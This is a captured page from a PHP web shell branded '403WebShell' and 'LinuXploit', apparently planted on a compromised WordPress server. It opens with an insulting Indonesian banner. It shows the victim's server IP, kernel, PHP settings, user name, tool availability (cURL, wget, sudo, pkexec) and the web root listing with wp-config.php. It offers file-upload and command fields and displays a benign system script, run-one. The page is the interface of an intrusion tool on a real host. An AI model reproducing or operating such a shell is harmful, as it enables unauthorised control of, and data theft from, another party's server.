buyer kontol nego ga ngotak comecondo.com
 Linux Sandbox-A 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
 Apache/2.4.18 (Ubuntu)
 68.183.124.220
 Cant read /etc/named.conf
Name Type Size Owner/Group Permission Last Modified Actions
. dir - gavin/www-data drwxr-sr-x 2024-12-15 11:41:30
.. dir - root/root drwxr-xr-x 2019-08-25 02:29:45
.sucuriquarantine dir - root/www-data drwxr-sr-x 2024-05-24 05:31:33
home dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
worksheets dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
wp-admin dir - gavin/www-data drwxr-sr-x 2025-08-29 03:10:31
wp-content dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
wp-includes dir - gavin/www-data drwxr-sr-x 2021-06-27 11:01:30
.htaccess text/plain 201 B root/www-data -rw-r--r-- 2021-06-24 04:05:20
agent-contact-1.JPG image/jpeg 22.78 KB gavin/www-data -rw-rw-r-- 2022-01-31 05:13:10
circle-16.png image/png 268 B gavin/www-data -rw-rw-r-- 2021-01-11 04:23:00
index.html text/html 11.06 KB gavin/www-data -rw-r--r-- 2019-08-25 02:29:47
index.php text/x-php 420 B gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
license.txt text/plain 19.47 KB gavin/www-data -rw-r--r-- 2019-01-01 08:37:49
map.php text/html 1012 B gavin/www-data -rw-rw-r-- 2021-01-01 03:50:38
pin-8-16.png image/png 309 B gavin/www-data -rw-rw-r-- 2021-01-11 04:38:33
pin-8-24.png image/png 499 B gavin/www-data -rw-rw-r-- 2021-01-11 04:40:01
pin-blue-1.png image/png 28.16 KB gavin/www-data -rw-rw-r-- 2022-01-27 09:10:36
pin-green-1.png image/png 12.71 KB gavin/www-data -rw-rw-r-- 2022-01-27 09:23:52
pin-house-red-2.png image/png 1.36 KB gavin/www-data -rw-rw-r-- 2022-01-30 09:18:10
pin-house-red-3.png image/png 2.49 KB gavin/www-data -rw-rw-r-- 2022-01-30 09:20:50
readme.html text/html 7.27 KB gavin/www-data -rw-r--r-- 2019-04-08 10:59:56
wallpaper1.jpg image/jpeg 58.99 KB gavin/www-data -rw-rw-r-- 2022-01-29 05:15:06
wallpaper2.jpg image/jpeg 788.8 KB gavin/www-data -rw-rw-r-- 2022-02-01 11:27:14
wp-activate.php text/x-php 6.76 KB gavin/www-data -rw-r--r-- 2019-01-12 06:41:52
wp-blog-header.php text/x-php 369 B gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-comments-post.php text/x-php 2.23 KB gavin/www-data -rw-r--r-- 2019-01-21 01:34:51
wp-config-sample.php text/x-php 2.83 KB gavin/www-data -rw-r--r-- 2020-10-24 04:07:41
wp-config.php text/x-php 3.62 KB gavin/www-data -rw-r--r-- 2022-04-20 01:23:49
wp-cron.php text/x-php 3.76 KB gavin/www-data -rw-r--r-- 2019-01-09 08:37:51
wp-links-opml.php text/x-php 2.44 KB gavin/www-data -rw-r--r-- 2019-01-16 05:29:49
wp-load.php text/x-php 3.23 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-login.php text/x-php 38.62 KB gavin/www-data -rw-r--r-- 2019-06-10 01:34:45
wp-mail.php text/x-php 8.21 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-settings.php text/x-php 18.52 KB gavin/www-data -rw-r--r-- 2019-03-28 07:04:51
wp-signup.php text/x-php 30.36 KB gavin/www-data -rw-r--r-- 2019-01-16 04:51:52
wp-trackback.php text/x-php 4.65 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
xmlrpc.php text/x-php 3 KB gavin/www-data -rw-r--r-- 2018-08-17 01:51:36
© BlackDragon
403WebShell
403Webshell
Server IP : 68.183.124.220  /  Your IP : 216.73.216.228
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux Sandbox-A 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : gavin ( 1000)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/bin/keep-one-running
#!/bin/sh -e
#
#    run-one - run just one instance at a time of some command and
#              unique set of arguments (useful for cronjobs, eg)
#
#    run-this-one - kill any identical command/args processes
#                   before running this one
#
#    run-one-constantly - run-one, but respawn every time that one exits
#
#    run-one-until-success - run-one, but respawn until a successful exit
#
#    run-one-until-failure - run-one, but respawn until an unsuccessful exit
#
#    Copyright (C) 2010-2013 Dustin Kirkland <kirkland@ubuntu.com>
#
#    Authors:
#        Dustin Kirkland <kirkland@ubuntu.com>
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.

PROG="run-one"

if [ $# -eq 0 ]; then
	echo "ERROR: no arguments specified" 1>&2
	exit 1
fi

# Cache hashes here, to keep one user from DoS'ing another
# Test if home is writeable and owned by the current user;
# which is not always the case -- e.g. daemon
USER=$(id -un)
for i in "${HOME}" "/dev/shm/${PROG}_${USER}"*; do
	if [ -w "$i" ] && [ -O "$i" ]; then
		DIR="$i"
		break
	fi
done
if [ -w "${DIR}" ] && [ -O "${DIR}" ]; then
	DIR="${DIR}/.cache/${PROG}"
else
	DIR=$(mktemp -d "/dev/shm/${PROG}_${USER}_XXXXXXXX")
	DIR="${DIR}/.cache/${PROG}"
fi
mkdir -p "$DIR"

# Calculate the hash of the command and arguments
CMD="$@"
CMDHASH=$(echo "$CMD" | md5sum | awk '{print $1}')
FLAG="$DIR/$CMDHASH"

base="$(basename $0)"
case "$base" in
	run-one)
		# Run the specified command, assuming we can flock this command string's hash
		flock -xn "$FLAG" "$@"
	;;
	run-this-one)
		ps="$CMD"
		# Loop through matching pids
		for p in $(pgrep -u "$USER" -f "^$ps$" || true); do
			# Try to kill pid
			kill $p
			# And then block until killed
			while ps $p >/dev/null 2>&1; do
				kill $p
				sleep 1
			done
		done
		# Also try to use lsof, but it seems that flock()'s
		# are not always persistent enough, so this is purely auxilliary.
		pid=$(lsof "$FLAG" 2>/dev/null | awk '{print $2}' | grep "^[0-9]") || true
		[ -z "$pid" ] || kill $pid
		sleep 0.5
		# Run the specified command, assuming we can flock this command string's hash
		flock -xn "$FLAG" "$@"
	;;
	keep-one-running|run-one-constantly|run-one-until-success|run-one-until-failure)
		backoff=0
		retries=0
		while true; do
			# Run the specified command, assuming we can flock this command string's hash
			set +e
			flock -xn "$FLAG" "$@"
			if [ "$?" = 0 ]; then
				# If we were waiting for success, we're done
				[ "$base" = "run-one-until-success" ] && exit $?
				# Last run finished successfully, reset to minimum back-off of 1 second
				backoff=0
				backoff=0
			else
				# If we were waiting for failure, we're done
				[ "$base" = "run-one-until-failure" ] && exit $?
				# Last run failed, so slow down the retries
				retries=$((retries + 1))
				backoff=$((retries / 10))
				logger -t "${base}[$$]" "last run failed; sleeping [$backoff] seconds before next run"
			fi
			# Don't sleep more than 60 seconds
			[ $backoff -gt 60 ] && backoff=60
			sleep $backoff
		done
	;;
esac

Youez - 2016 - github.com/yon3zu
LinuXploit